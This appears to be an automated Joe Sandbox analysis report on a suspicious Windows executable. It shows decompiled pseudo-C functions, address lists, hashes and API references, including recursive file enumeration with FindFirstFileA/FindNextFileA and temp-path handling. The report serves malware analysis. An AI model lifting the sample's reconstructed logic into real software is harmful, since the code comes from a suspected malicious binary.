                                                                          0x00407710
                                                                          0x00407715
                                                                          0x00407726
                                                                          0x00407731
                                                                          0x0040773e
                                                                          0x0040774e
                                                                          0x00407753
                                                                          0x00407754
                                                                          0x00407759
                                                                          0x0040775c
                                                                          0x00407765
                                                                          0x0040776a
                                                                          0x00407780
                                                                          0x00407785
                                                                          0x00407793
                                                                          0x004077a4
                                                                          0x004077a9
                                                                          0x004077ba
                                                                          0x004077cf
                                                                          0x004077d4
                                                                          0x004077d5
                                                                          0x004077da
                                                                          0x004077dd
                                                                          0x004077e3
                                                                          0x004077f3
                                                                          0x00407806
                                                                          0x00407819
                                                                          0x0040782c
                                                                          0x0040783f
                                                                          0x0040784c
                                                                          0x00407867
                                                                          0x0040786e
                                                                          0x00407871
                                                                          0x00407874
                                                                          0x00407881

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e2ffbce9ad41ee186f7f6225872613ed6a0bd1f14c14150b1f77e3a925856f57
                                                                          • Instruction ID: bad4d56910de55197467fd61e6ec6c56c875cf63360af75c5594bc2395637eb8
                                                                          • Opcode Fuzzy Hash: e2ffbce9ad41ee186f7f6225872613ed6a0bd1f14c14150b1f77e3a925856f57
                                                                          • Instruction Fuzzy Hash: 42514170B002199BDF10EB69CC51A9DB7B5EB46308F1084FAA404772D1DA3DAF458E5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004080E4, Relevance: .1, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 82%
                                                                          			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _v24;
				char _v28;
				void* _v32;
				char _v36;
				intOrPtr _t26;
				void* _t36;
				void* _t47;
				void* _t48;
				intOrPtr _t71;
				void* _t79;
				void* _t81;
				void* _t86;

				_t86 = __fp0;
				_t81 = __eflags;
				_t76 = __esi;
				_t75 = __edi;
				_t54 = __ebx;
				_v36 = 0;
				_v28 = 0;
				_v32 = 0;
				_v24 = 0;
				E00403F14(0x408054);
				_push(_t79);
				_push(0x408220);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79 + 0xffffffe0;
				E00407080(0x4091a8, 0xb, 0xb);
				E00407080(0x4091b4, 9, 9);
				E00407080(0x4091c0, 3, 3);
				E00407080(0x4091dc, 3, 3);
				_t26 =  *0x409210; // 0x40919c
				E00407080(_t26, 0xb, 0xb); // executed
				E004070DC(__ebx, __edi, __esi, _t81); // executed
				E004049D0(0, __ebx,  &_v24, __edi, __esi);
				if(E00404F6C(_v24) > 0xa200) {
					E00407678(_t54, _t75, _t76); // executed
				}
				E00407E90(_t54, _t75, _t76); // executed
				_t60 = 3;
				_t70 = 3;
				E00407080(0x4091c4, 3, 3);
				_t36 = E00404AE8(_t54, _t75, _t76);
				_t83 = _t36;
				if(_t36 != 0) {
					E004049D0(0, _t54,  &_v28, _t75, _t76);
					_push(_v28);
					_t60 = 3;
					E004031F4( &_v32, 3, 0x4091c4);
					_t70 = _v32;
					_pop(_t47);
					_t48 = E00406FE4(_t47, _t54, _v32, _t83);
					_t84 = _t48;
					if(_t48 != 0) {
						_t70 =  &_v36;
						E004049D0(1, _t54,  &_v36, _t75, _t76);
						E00407D9C(_v36, _t54,  &_v36, _t75, _t76); // executed
					}
				}
				E004079A0(_t54, _t75, _t76, _t84); // executed
				E0040759C(_t54, _t60, _t70, _t75, _t76, _t84, _t86); // executed
				_pop(_t71);
				 *[fs:eax] = _t71;
				_push(0x408227);
				return E004030B8( &_v36, 4);
			}















                                                                          0x004080e4
                                                                          0x004080e4
                                                                          0x004080e4
                                                                          0x004080e4
                                                                          0x004080e4
                                                                          0x004080ec
                                                                          0x004080ef
                                                                          0x004080f2
                                                                          0x004080f5
                                                                          0x004080fd
                                                                          0x00408104
                                                                          0x00408105
                                                                          0x0040810a
                                                                          0x0040810d
                                                                          0x0040811f
                                                                          0x00408133
                                                                          0x00408147
                                                                          0x0040815b
                                                                          0x00408160
                                                                          0x0040816f
                                                                          0x00408174
                                                                          0x0040817e
                                                                          0x00408190
                                                                          0x00408192
                                                                          0x00408192
                                                                          0x00408197
                                                                          0x004081a1
                                                                          0x004081a6
                                                                          0x004081ab
                                                                          0x004081b0
                                                                          0x004081b5
                                                                          0x004081b7
                                                                          0x004081be
                                                                          0x004081c6
                                                                          0x004081cf
                                                                          0x004081d4
                                                                          0x004081d9
                                                                          0x004081dc
                                                                          0x004081dd
                                                                          0x004081e2
                                                                          0x004081e4
                                                                          0x004081e6
                                                                          0x004081ee
                                                                          0x004081f6
                                                                          0x004081f6
                                                                          0x004081e4
                                                                          0x004081fb
                                                                          0x00408200
                                                                          0x00408207
                                                                          0x0040820a
                                                                          0x0040820d
                                                                          0x0040821f

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileFindModule$CloseFirstHandleName
                                                                          • String ID:
                                                                          • API String ID: 2572062711-0
                                                                          • Opcode ID: 6d70fba820807f475e386924a9e2af15878d2dd69a0bc15187a92624e301fe42
                                                                          • Instruction ID: ce7274d5a0203330cd45a7cf6d0e011d083bf460e717dce8afa0a39e5ced3773
                                                                          • Opcode Fuzzy Hash: 6d70fba820807f475e386924a9e2af15878d2dd69a0bc15187a92624e301fe42
                                                                          • Instruction Fuzzy Hash: D4211E70B142054BEB40B7B6C95279F76A5DB88304F50493FE544BB3C2DA3DAD0586AE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004074B4, Relevance: .1, Instructions: 81COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 60%
                                                                          			E004074B4(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t34;
				intOrPtr _t62;
				void* _t71;
				void* _t72;
				void* _t74;
				intOrPtr _t77;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v8 = __eax;
				E004033FC(_v8);
				_push(_t77);
				_push(0x40758b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t77;
				E004031F4( &_v12, 3, 0x4091dc);
				_t49 = E004052AC(_v8, 0, _v12);
				_t71 = E0040532C(_t25) - 1;
				if(_t71 >= 0) {
					_t72 = _t71 + 1;
					_t74 = 0;
					do {
						_t34 = E0040534C(_t49, _t74);
						_t81 = _t34;
						if(_t34 == 0) {
							E00405338(_t49,  &_v28, _t74);
							E00403258( &_v24, _v28,  *((intOrPtr*)(_t49 + 0x1c)));
							E004071D0(_v24, _t49, _t72, _t74); // executed
						} else {
							E00405338(_t49,  &_v20, _t74);
							E00403258( &_v16, _v20,  *((intOrPtr*)(_t49 + 0x1c)));
							E004074B4(_v16, _t49, _t72, _t74, _t81, _a4); // executed
						}
						_t74 = _t74 + 1;
						_t72 = _t72 - 1;
					} while (_t72 != 0);
				}
				E00404520(_t49);
				_pop(_t62);
				 *[fs:eax] = _t62;
				_push(E00407592);
				return E004030B8( &_v28, 6);
			}















                                                                          0x004074b9
                                                                          0x004074ba
                                                                          0x004074bb
                                                                          0x004074bc
                                                                          0x004074bd
                                                                          0x004074be
                                                                          0x004074c2
                                                                          0x004074c8
                                                                          0x004074cf
                                                                          0x004074d0
                                                                          0x004074d5
                                                                          0x004074d8
                                                                          0x004074e8
                                                                          0x004074fa
                                                                          0x00407505
                                                                          0x00407508
                                                                          0x0040750a
                                                                          0x0040750b
                                                                          0x0040750d
                                                                          0x00407511
                                                                          0x00407516
                                                                          0x00407518
                                                                          0x0040754a
                                                                          0x00407558
                                                                          0x00407560
                                                                          0x0040751a
                                                                          0x00407525
                                                                          0x00407533
                                                                          0x0040753b
                                                                          0x00407540
                                                                          0x00407565
                                                                          0x00407566
                                                                          0x00407566
                                                                          0x0040750d
                                                                          0x0040756b
                                                                          0x00407572
                                                                          0x00407575
                                                                          0x00407578
                                                                          0x0040758a

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fd7c348ce77f50c17542cebb3b0538e5ca6a1de9245a361f45dd7a6b294aa538
                                                                          • Instruction ID: 101897594dce54360dc52a275b3a014dbc9cabf376d6d76c5a5bbcf91f550c41
                                                                          • Opcode Fuzzy Hash: fd7c348ce77f50c17542cebb3b0538e5ca6a1de9245a361f45dd7a6b294aa538
                                                                          • Instruction Fuzzy Hash: 53218830B045096FCB04EF65CC8299F77A9EB84304B60447FB801B77C2DA78EE058B55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404DE0, Relevance: .1, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 56%
                                                                          			E00404DE0(char __eax, signed int __ebx) {
				void* _v8;
				char _v12;
				void* _v16;
				char _v20;
				void* _t45;
				intOrPtr _t55;
				intOrPtr _t64;
				void* _t65;
				void* _t68;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_v8 = __eax;
				E004033FC(_v8);
				_push(_t64);
				_push(0x404e9f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t64;
				_t65 = E0040320C(_v8);
				_t49 = __ebx & 0xffffff00 | _t65 > 0x00000000;
				if((__ebx & 0xffffff00 | _t65 > 0x00000000) != 0) {
					E00404DCC(_v8,  &_v12);
					E0040312C( &_v8, _v12);
					if(E0040320C(_v8) >= 3) {
						_t68 = E00404CF8(_v8);
						if(_t68 == 0) {
							E00404EEC( &_v16);
							E00403358(_v16, _v8);
							if(_t68 != 0) {
								E00404EEC( &_v20);
								_t45 = E00404DE0(_v20, _t49); // executed
								if(_t45 == 0 || E00404EB0(_v8) == 0) {
								}
							}
						}
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E00404EA6);
				return E004030B8( &_v20, 4);
			}












                                                                          0x00404de5
                                                                          0x00404de6
                                                                          0x00404de7
                                                                          0x00404de8
                                                                          0x00404de9
                                                                          0x00404dea
                                                                          0x00404df0
                                                                          0x00404df7
                                                                          0x00404df8
                                                                          0x00404dfd
                                                                          0x00404e00
                                                                          0x00404e0b
                                                                          0x00404e0d
                                                                          0x00404e12
                                                                          0x00404e1a
                                                                          0x00404e25
                                                                          0x00404e35
                                                                          0x00404e3f
                                                                          0x00404e41
                                                                          0x00404e49
                                                                          0x00404e54
                                                                          0x00404e59
                                                                          0x00404e61
                                                                          0x00404e69
                                                                          0x00404e70
                                                                          0x00404e70
                                                                          0x00404e70
                                                                          0x00404e59
                                                                          0x00404e41
                                                                          0x00404e35
                                                                          0x00404e86
                                                                          0x00404e89
                                                                          0x00404e8c
                                                                          0x00404e9e

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 60dcf029e418bb4de6c98b25837b89894300ef75002f4660ff180e9b0e990edb
                                                                          • Instruction ID: 1dfd328e9d81c806f2c03a8771cfa584465e3ed9e3942cc4fd01b0b075e0960a
                                                                          • Opcode Fuzzy Hash: 60dcf029e418bb4de6c98b25837b89894300ef75002f4660ff180e9b0e990edb
                                                                          • Instruction Fuzzy Hash: 712106B4600209EFDF00EFA5C94299EB7B8FF85304B5045BABA04B72D1D778AF04D658
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406E94, Relevance: .0, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E00406E94(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _t20;
				void* _t24;
				intOrPtr _t40;
				void* _t46;

				_push(__ebx);
				_v16 = 0;
				_v20 = 0;
				_push(_t46);
				_push(0x406f22);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff0;
				E00405008( &_v16, 1, __ecx);
				_push( &_v16);
				E004031F4( &_v20, 0xb, 0x40919c);
				_pop(_t20);
				E00403214(_t20, _v20);
				_t24 = E00404C78(E0040340C(_v16), 1, 8,  &_v12, __edi, __esi); // executed
				if(_t24 != 0) {
					E004057D8(__fp0);
					asm("fcomp dword [0x406f30]");
					asm("fnstsw ax");
					asm("sahf");
				}
				_pop(_t40);
				 *[fs:eax] = _t40;
				_push(E00406F29);
				return E004030B8( &_v20, 2);
			}










                                                                          0x00406e9a
                                                                          0x00406e9d
                                                                          0x00406ea0
                                                                          0x00406ea5
                                                                          0x00406ea6
                                                                          0x00406eab
                                                                          0x00406eae
                                                                          0x00406eb6
                                                                          0x00406ebe
                                                                          0x00406ecc
                                                                          0x00406ed4
                                                                          0x00406ed5
                                                                          0x00406eea
                                                                          0x00406ef1
                                                                          0x00406ef3
                                                                          0x00406efb
                                                                          0x00406f01
                                                                          0x00406f03
                                                                          0x00406f04
                                                                          0x00406f09
                                                                          0x00406f0c
                                                                          0x00406f0f
                                                                          0x00406f21

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LocalPathTempTime
                                                                          • String ID:
                                                                          • API String ID: 2118298429-0
                                                                          • Opcode ID: be31c71bef31dcf0d495f0e1e2d88fef08ea193925f7f09ef08642d0a6e869a3
                                                                          • Instruction ID: 68f96da1d51e9565b10b5108b435a8bc67f0bfec9723d228dfcbae9d3fbb17ab
                                                                          • Opcode Fuzzy Hash: be31c71bef31dcf0d495f0e1e2d88fef08ea193925f7f09ef08642d0a6e869a3
                                                                          • Instruction Fuzzy Hash: 4A0175709042099FDB00EFA5DC5159FB7BDFB45300F52857BE414F36C5DB38AA148A69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004052AC, Relevance: .0, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004052AC(void* __eax, void* __ecx, void* __edx) {
				void* __esi;
				void* _t7;
				intOrPtr _t11;
				void* _t14;

				_t14 = __eax;
				_t11 =  *0x40447c; // 0x404488
				_t7 = E004044F8(_t11, 0);
				E00405634(_t7, __edx, _t14, _t14, 0, __ecx); // executed
				return _t7;
			}







                                                                          0x004052b4
                                                                          0x004052b6
                                                                          0x004052c3
                                                                          0x004052cc
                                                                          0x004052d7

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileFind$FirstNext
                                                                          • String ID:
                                                                          • API String ID: 1690352074-0
                                                                          • Opcode ID: 4f493d9307b3d4b817a7e836544abeb962cbb198da26cb643227803e88156b29
                                                                          • Instruction ID: b59b8e1bf290491f0b5bd01f3f1f1884d5f58955f35eb0aac9512fedb03d6d3a
                                                                          • Opcode Fuzzy Hash: 4f493d9307b3d4b817a7e836544abeb962cbb198da26cb643227803e88156b29
                                                                          • Instruction Fuzzy Hash: 70D0A76230111417870065BF2C84C2BF3CDCBCD565391413AB208D7341DD35AC0742B8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00402448, Relevance: .0, Instructions: 14COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E00402448(void* __eax) {
				void* _t3;
				void* _t6;

				if(__eax <= 0) {
					_t6 = 0;
				} else {
					_t3 =  *0x409030(); // executed
					_t6 = _t3;
					if(_t6 == 0) {
						E00402530(1);
					}
				}
				return _t6;
			}





                                                                          0x0040244b
                                                                          0x00402462
                                                                          0x0040244d
                                                                          0x0040244d
                                                                          0x00402453
                                                                          0x00402457
                                                                          0x0040245b
                                                                          0x0040245b
                                                                          0x00402457
                                                                          0x00402467

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8dfeac06a829af607fe89a8817dc8f9230199d36438cef303ac21605a03e7c3b
                                                                          • Instruction ID: d53205a698bee5913c9905fe3b2fa7a5b2040cee35667c8cc0b5dc0e3ef69e66
                                                                          • Opcode Fuzzy Hash: 8dfeac06a829af607fe89a8817dc8f9230199d36438cef303ac21605a03e7c3b
                                                                          • Instruction Fuzzy Hash: 6AC08C6030270387DB202AFA1FDC113125C3F24205300403BA901F13D3EAF8CD089A2F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406510, Relevance: .0, Instructions: 7COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00406510(void* __eax, void* __edx) {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				intOrPtr* _t10;

				_t3 = E00406B48(_t10, _t4, __edx, 0, _t8, _t9); // executed
				return _t3;
			}








                                                                          0x00406517
                                                                          0x0040651d

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: IconInfo
                                                                          • String ID:
                                                                          • API String ID: 2096194817-0
                                                                          • Opcode ID: 3aa0d1c17f7541c88f4a23eede43810dced38d8a94ff8caad404287aac718eb2
                                                                          • Instruction ID: 2c83cf8f1268621ffc1ea80895ab672af1bae2362a1aae74aa6b220125402c61
                                                                          • Opcode Fuzzy Hash: 3aa0d1c17f7541c88f4a23eede43810dced38d8a94ff8caad404287aac718eb2
                                                                          • Instruction Fuzzy Hash: 92A002C6751214079B4CE53F1C6292A729F07C8615759C87A7906DA289CD38E8512155
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 0040D815, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0040C2A0: GetKeyboardType.USER32(00000000), ref: 0040C2A5
                                                                            • Part of subcall function 0040C2A0: GetKeyboardType.USER32(00000001), ref: 0040C2B1
                                                                          • GetCommandLineA.KERNEL32 ref: 0040D87B
                                                                          • GetVersion.KERNEL32 ref: 0040D88F
                                                                          • GetVersion.KERNEL32 ref: 0040D8A0
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0040D8DC
                                                                            • Part of subcall function 0040C2D0: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C2F2
                                                                            • Part of subcall function 0040C2D0: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C325
                                                                            • Part of subcall function 0040C2D0: RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C33B
                                                                          • GetThreadLocale.KERNEL32 ref: 0040D8BC
                                                                            • Part of subcall function 0040D74C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 0040D772
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                          • String ID: p8b
                                                                          • API String ID: 3734044017-529731021
                                                                          • Opcode ID: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                          • Instruction ID: 917de0a484455ad82c20158439a2a24f06621c5804a29fc775aa2cf17b207d74
                                                                          • Opcode Fuzzy Hash: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                          • Instruction Fuzzy Hash: F10129B1C113449AE711BFB1AA463193A60AB1130CF10857FD151762E2EB7D00A8DB6F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040F0C4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                                          • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                                          • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID: *.*
                                                                          • API String ID: 3541575487-438819550
                                                                          • Opcode ID: 1eb9b05f6550193698417fdfd1abd8b4f720dd67f104cddbbfc16bbf0ec42b4c
                                                                          • Instruction ID: 21f552544a71644aa5a29d04448db43bc273ae507e021618840bae1d7485b843
                                                                          • Opcode Fuzzy Hash: 1eb9b05f6550193698417fdfd1abd8b4f720dd67f104cddbbfc16bbf0ec42b4c
                                                                          • Instruction Fuzzy Hash: C431B071704100ABDB15AB66D88286B37A9DF86328720457FF804EF6C7DA7CDC1A8699
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040F0CC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                                          • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                                          • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID: *.*
                                                                          • API String ID: 3541575487-438819550
                                                                          • Opcode ID: ca5e68894038c338b17cd596c0991537003cad852163082c19a1be6d7e7f9c81
                                                                          • Instruction ID: 271996e333eb2d0f8e3e23676571f4307960fb9fe6b8e39aca4bbd563d4a420a
                                                                          • Opcode Fuzzy Hash: ca5e68894038c338b17cd596c0991537003cad852163082c19a1be6d7e7f9c81
                                                                          • Instruction Fuzzy Hash: 1031C171700100ABDB14EF67D88286B369ADF85328720457FF804EF6C7EA7CDC0A8699
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040EB18, Relevance: 4.6, APIs: 3, Instructions: 100fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,Function_000051DB), ref: 0040EBD3
                                                                          • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040EC33
                                                                          • FindClose.KERNEL32(00000000,00000000,00000010), ref: 0040EC43
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: 4092cce72e1492469b29ed450f25109bd7218eb8d29261f7a9cbb69d7287a135
                                                                          • Instruction ID: c0991531ddac9e0079019e73ada339c648f4459b5552238d600e3526c74abf5e
                                                                          • Opcode Fuzzy Hash: 4092cce72e1492469b29ed450f25109bd7218eb8d29261f7a9cbb69d7287a135
                                                                          • Instruction Fuzzy Hash: 24412C30904618DBDB21EBA6C885BDEB7B5EF48308F5045FAA404B7291D73CAE45DE58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040F13F, Relevance: 4.6, APIs: 3, Instructions: 74fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
